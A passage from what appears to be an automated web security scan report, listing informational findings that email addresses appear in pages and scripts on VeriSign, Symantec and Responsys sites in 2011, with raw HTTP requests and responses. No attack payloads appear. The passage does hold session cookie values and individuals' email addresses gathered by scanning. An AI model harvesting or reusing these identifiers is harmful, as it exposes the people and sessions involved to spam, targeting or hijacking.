Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://idprotect.verisign.com/toolbar/home.v
Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:47:39 GMT
Content-Type: text/html
Content-Length: 6532
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
...[SNIP]...
<a name="header-email" target="_top" href="mailto:vip-support@verisign.com">
...[SNIP]...

17.11. https://idprotect.verisign.com/toolbar/home.v

Summary

Severity:   Information
Confidence:   Certain
Host:   https://idprotect.verisign.com
Path:   /toolbar/home.v

Issue detail

The following email address was disclosed in the response:

Request

GET /toolbar/home.v HTTP/1.1
Host: idprotect.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:42:02 GMT
Content-Type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
...[SNIP]...
<a name="header-email" target="_top" href="mailto:vip-support@verisign.com">
...[SNIP]...

17.12. https://idprotect.verisign.com/toolbar/install.v

Summary

Severity:   Information
Confidence:   Certain
Host:   https://idprotect.verisign.com
Path:   /toolbar/install.v

Issue detail

The following email address was disclosed in the response:

Request

GET /toolbar/install.v HTTP/1.1
Host: idprotect.verisign.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://idprotect.verisign.com/toolbar/download.v
Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:47:40 GMT
Content-Type: text/html
Content-Length: 6820
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
...[SNIP]...
<a name="header-email" target="_top" href="mailto:vip-support@verisign.com">
...[SNIP]...

17.13. https://idprotect.verisign.com/wheretouse.v

Summary

Severity:   Information
Confidence:   Certain
Host:   https://idprotect.verisign.com
Path:   /wheretouse.v

Issue detail

The following email address was disclosed in the response:

Request

GET /wheretouse.v HTTP/1.1
Host: idprotect.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:42:02 GMT
Content-Type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
...[SNIP]...
<a name="header-email" target="_top" href="mailto:vip-support@verisign.com">
...[SNIP]...

17.14. https://knowledge.verisign.ch/support/code-signing-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.ch
Path:   /support/code-signing-support/index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /support/code-signing-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<a href="mailto:channel-partners@verisign.com?tid=gnpartners">
...[SNIP]...

17.15. https://knowledge.verisign.ch/support/digital-id-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.ch
Path:   /support/digital-id-support/index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /support/digital-id-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:04 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<a href="mailto:channel-partners@verisign.com?tid=gnpartners">
...[SNIP]...

17.16. https://knowledge.verisign.ch/support/mpki-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.ch
Path:   /support/mpki-support/index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /support/mpki-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<a href="mailto:channel-partners@verisign.com?tid=gnpartners">
...[SNIP]...

17.17. https://knowledge.verisign.ch/support/ssl-certificates-support/index

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.ch
Path:   /support/ssl-certificates-support/index

Issue detail

The following email addresses were disclosed in the response:

Request

GET /support/ssl-certificates-support/index?page=content&actp=CROSSLINK&id=AR1601 HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:42:33 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio
...[SNIP]...
<a href="mailto:channel-partners@verisign.com?tid=gnpartners">
...[SNIP]...
<a target="_blank" href="javascript:location.href='mailto:'+String.fromCharCode(115,117,112,112,111,114,116,64,118,101,114,105,115,105,103,110,46,99,104)+'?'">support@verisign.ch</a>
...[SNIP]...
<a href="javascript:location.href='mailto:'+String.fromCharCode(115,117,112,112,111,114,116,64,118,101,114,105,115,105,103,110,46,99,104)+'?'">support@verisign.ch</a>
...[SNIP]...

17.18. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.ch
Path:   /support/ssl-certificates-support/index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /support/ssl-certificates-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:42:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<a href="mailto:channel-partners@verisign.com?tid=gnpartners">
...[SNIP]...

17.19. https://knowledge.verisign.ch/support/trust-seal-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.ch
Path:   /support/trust-seal-support/index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /support/trust-seal-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<a href="mailto:channel-partners@verisign.com?tid=gnpartners">
...[SNIP]...

17.20. https://knowledge.verisign.com/apps/infocenter/sites/verisign/js/jquery.hover_intent.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /apps/infocenter/sites/verisign/js/jquery.hover_intent.js

Issue detail

The following email address was disclosed in the response:

Request

GET /apps/infocenter/sites/verisign/js/jquery.hover_intent.js HTTP/1.1
Host: knowledge.verisign.com
Connection: keep-alive
Referer: https://knowledge.verisign.com/support/mpki-for-ssl-support/index?page=content&id=AR1295&pmv=print&actp=PRINT&viewlocale=fr_FR
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621614|session#1315621455064-973488#1315623414|PC#1315621455064-973488.19#1378693554; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=44BE2FA4819F216406CBA2DF030D4F7C

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:29 GMT
Server: Apache
Last-Modified: Thu, 18 Aug 2011 11:31:30 GMT
ETag: "34cc8-64e-4aac5f440a880"
Accept-Ranges: bytes
Content-Length: 1614
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: application/x-javascript

/**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @p
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

17.21. https://knowledge.verisign.com/support/code-signing-support/index

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /support/code-signing-support/index

Issue detail

The following email address was disclosed in the response:

Request

GET /support/code-signing-support/index?page=content&id=AR185 HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:44:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio
...[SNIP]...
<a href="mailto:channel-partners@verisign.com?tid=gnpartners">
...[SNIP]...

17.22. https://knowledge.verisign.com/support/code-signing-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /support/code-signing-support/index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /support/code-signing-support/index.html HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:44:18 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<a href="mailto:channel-partners@verisign.com?tid=gnpartners">
...[SNIP]...

17.23. https://knowledge.verisign.com/support/digital-id-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /support/digital-id-support/index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /support/digital-id-support/index.html?tid=gnsupport HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:44:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<a href="mailto:channel-partners@verisign.com?tid=gnpartners">
...[SNIP]...

17.24. https://knowledge.verisign.com/support/eca-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /support/eca-support/index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /support/eca-support/index.html HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:44:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<a href="mailto:channel-partners@verisign.com?tid=gnpartners">
...[SNIP]...

17.25. https://knowledge.verisign.com/support/mpki-for-ssl-support/apps/infocenter/resources/js/smart-btn.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /support/mpki-for-ssl-support/apps/infocenter/resources/js/smart-btn.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /support/mpki-for-ssl-support/apps/infocenter/resources/js/smart-btn.js HTTP/1.1
Host: knowledge.verisign.com
Connection: keep-alive
Referer: https://knowledge.verisign.com/support/mpki-for-ssl-support/index?page=home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; JSESSIONID=0BA75884D1245C296CF5414E376DC3FC; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623558|PC#1315621455064-973488.19#1378693698|check#true#1315621758

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:27:52 GMT
Server: Apache
Last-Modified: Thu, 18 Aug 2011 11:31:30 GMT
ETag: "345a8-71a-4aac5f440a880"
Accept-Ranges: bytes
Content-Length: 1818
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: application/x-javascript

.../*
InstantService Smart Button Integration
VeriSign, Inc
Developer: Josh Santomieri (jsantomieri@verisign.com, joshs@santsys.com)
Date: 1/8/2010

Requirements:
This script requires jQuery (http://www.jquery.com).
*/


function SmartButtonHandler() {

   var self = this;

   this.parse = function() {
       $('div[type
...[SNIP]...

17.26. https://knowledge.verisign.com/support/mpki-for-ssl-support/index

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /support/mpki-for-ssl-support/index

Issue detail

The following email address was disclosed in the response:

Request

GET /support/mpki-for-ssl-support/index?page=home HTTP/1.1
Host: knowledge.verisign.com
Connection: keep-alive
Referer: https://knowledge.verisign.com/support/mpki-for-ssl-support/index?page=content&id=AR1295&pmv=print&actp=PRINT&viewlocale=fr_FR
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; JSESSIONID=0BA75884D1245C296CF5414E376DC3FC; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:27:51 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Length: 42730


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<a href="mailto:channel-partners@verisign.com?tid=gnpartners">
...[SNIP]...

17.27. https://knowledge.verisign.com/support/mpki-for-ssl-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /support/mpki-for-ssl-support/index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /support/mpki-for-ssl-support/index.html HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:45:43 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<a href="mailto:channel-partners@verisign.com?tid=gnpartners">
...[SNIP]...

17.28. https://knowledge.verisign.com/support/mpki-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /support/mpki-support/index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /support/mpki-support/index.html HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:44:41 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<a href="mailto:channel-partners@verisign.com?tid=gnpartners">
...[SNIP]...

17.29. https://knowledge.verisign.com/support/ssl-certificates-support/apps/infocenter/resources/js/smart-btn.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /support/ssl-certificates-support/apps/infocenter/resources/js/smart-btn.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /support/ssl-certificates-support/apps/infocenter/resources/js/smart-btn.js HTTP/1.1
Host: knowledge.verisign.com
Connection: keep-alive
Referer: https://knowledge.verisign.com/support/ssl-certificates-support/index?vproductcat=V_C_S&page=content&id=AR1295&actp=PRINT&viewlocale=fr_FR&impressions=false
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621614|session#1315621455064-973488#1315623414|PC#1315621455064-973488.19#1378693554; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=0BA75884D1245C296CF5414E376DC3FC

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:34 GMT
Server: Apache
Last-Modified: Thu, 18 Aug 2011 11:31:30 GMT
ETag: "345a8-71a-4aac5f440a880"
Accept-Ranges: bytes
Content-Length: 1818
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: application/x-javascript

.../*
InstantService Smart Button Integration
VeriSign, Inc
Developer: Josh Santomieri (jsantomieri@verisign.com, joshs@santsys.com)
Date: 1/8/2010

Requirements:
This script requires jQuery (http://www.jquery.com).
*/


function SmartButtonHandler() {

   var self = this;

   this.parse = function() {
       $('div[type
...[SNIP]...

17.30. https://knowledge.verisign.com/support/ssl-certificates-support/index

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /support/ssl-certificates-support/index

Issue detail

The following email address was disclosed in the response:

Request

GET /support/ssl-certificates-support/index?vproductcat=V_C_S&page=content&id=AR1295&actp=PRINT&viewlocale=fr_FR&impressions=false HTTP/1.1
Host: knowledge.verisign.com
Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Length: 46210


                                                                                                                                                                                                                                                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio
...[SNIP]...
<a href="mailto:channel-partners@verisign.com?tid=gnpartners">
...[SNIP]...

17.31. https://knowledge.verisign.com/support/ssl-certificates-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /support/ssl-certificates-support/index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /support/ssl-certificates-support/index.html HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<a href="mailto:channel-partners@verisign.com?tid=gnpartners">
...[SNIP]...

17.32. https://knowledge.verisign.com/support/trust-seal-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /support/trust-seal-support/index.html

Issue detail

The following email address was disclosed in the response:

Request

GET /support/trust-seal-support/index.html HTTP/1.1
Host: knowledge.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:44:18 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<a href="mailto:channel-partners@verisign.com?tid=gnpartners">
...[SNIP]...

17.33. http://partnerlocator.symantec.com/static/prod_plocator_s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://partnerlocator.symantec.com
Path:   /static/prod_plocator_s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /static/prod_plocator_s_code.js HTTP/1.1
Host: partnerlocator.symantec.com
Proxy-Connection: keep-alive
Referer: http://partnerlocator.symantec.com/public/search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; s_pers=%20s_nr%3D1315622094388-New%7C1336358094388%3B%20event69%3Devent69%7C1336358094390%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/10; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3Dsymantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den/us%2525253ASMBStore%2525253ALRC%2525253ARenewal%25252520Search%252526pidt%25253D1%252526oid%25253Djavascript%2525253AfindReseller%25252528%25252527http%2525253A//partnerlocator.symantec.com/public/search%25252527%25252529%252526ot%25253DA%2526rmkr-symlrc-cust-prod%253D%252526pid%25253DsymRen%2525253ALRC%2525253ARenewals%2525253ARenewal%25252520Search%252526pidt%25253D1%252526oid%25253Djavascript%2525253AfindReseller%25252528%25252527http%2525253A//partnerlocator.symantec.com/public/search%25252527%25252529%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Fri, 09 Sep 2011 21:37:41 GMT
Content-Type: application/x-javascript
Content-Length: 28714
Last-Modified: Fri, 02 Jul 2010 19:50:45 GMT
Connection: keep-alive
Accept-Ranges: bytes

/* SiteCatalyst code version: H.20.3.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */

var s_account="symanteccom,veritasnonconsumer,symantecpartner"
var s=s_
...[SNIP]...
=s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;"
+"`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t"
+";s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id
...[SNIP]...

17.34. https://policy3.responsys.net/privacy.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://policy3.responsys.net
Path:   /privacy.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /privacy.htm HTTP/1.1
Host: policy3.responsys.net
Connection: keep-alive
Referer: https://policy3.responsys.net/permission.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:40:06 GMT
Server: Apache
Last-Modified: Wed, 19 May 2010 07:38:58 GMT
ETag: "1f21312-1bfd-486ed8d030880"
Accept-Ranges: bytes
Content-Length: 7165
Connection: close
